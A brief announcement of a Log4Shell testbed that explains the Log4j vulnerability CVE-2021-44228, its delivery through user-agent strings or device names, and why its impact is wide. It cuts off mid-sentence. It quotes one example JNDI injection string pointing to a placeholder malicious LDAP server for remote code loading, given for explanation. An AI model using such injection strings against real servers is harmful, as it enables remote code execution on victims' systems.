Log4Shell testbed released
Log4Shell (CVE-2021-44228) is a serious zero-day security vulnerability in a widely used Java logging library Log4j, disclosed to public on 9 Dec 2021. It allows a remote attacker to execute arbitrary java program in a victim server with vulnerable Log4j library, by simply sending a carefully crafted string ( e.g. “${ jndi:ldap :// malicious_ldap_server / malicious_java_program }”) to the victim server. The attacker may trigger this security vulnerability and launch a remote attack by simply changing its web browser user-agent value to such string, or just renaming its iOS device to such string. The damage of this security vulnerability is huge, due to multiple reasons, including the Java logging library Log4j is widely used in servers, this security bug appears as early as 2013 and has existed for a long time without being discovered by public , the attacker can easily and remotely execute any malicious program in a victim ...